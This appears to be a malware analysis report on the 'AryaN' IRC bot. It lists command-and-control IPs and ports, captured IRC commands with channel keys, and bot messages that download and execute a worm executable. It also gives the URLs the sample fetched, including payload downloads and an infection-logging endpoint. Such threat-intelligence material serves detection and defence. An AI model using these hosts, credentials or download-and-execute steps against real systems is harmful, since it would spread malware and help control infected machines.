46.105.241.160 (AryaN bot hosted in United Kingdom, OVH Systems)

Remote Host       Port Number
199.15.234.7      80
64.62.181.43      80
65.254.248.151    80
46.105.241.160    6667    PASS none or PASS passwd

MODE New{US-XP-x86}8220715 +iMm
JOIN #xxARYANxx# styggen
JOIN #dl
PRIVMSG #dl :[AryaN]: Downloading File: “http://ohnull.fileave.com/worm_crypt.exe”
PRIVMSG #dl :[AryaN]: Successfully Downloaded File To: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
PRIVMSG #dl :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
NICK New{US-XP-x86}8220715
USER 8220715 “” “8220715” :8220715

NICK New{US-XP-x86}1124207
USER 1124207 “” “1124207” :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
PONG :asldfj.servmenow

NICK n{US|XPa}zfsweqj
USER zfsweqj 0 0 :zfsweqj
JOIN #ngr ngrBot

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://ohnull.fileave.com/fudaryan.exe
http://ohnull.fileave.com/worm_crypt.exe
http://propcworx.com/icons/worm.php?logdata=Downloaded%20payload
http://propcworx.com/icons/worm.php?logdata=Executed%20payload
http://propcworx.com/icons/worm.php?logdata=Infected
http://propcworx.com/icons/worm.php?logdata=RAR%20archives%20infected

Hosting info:
http://whois.domaintools.com/46.105.241.160
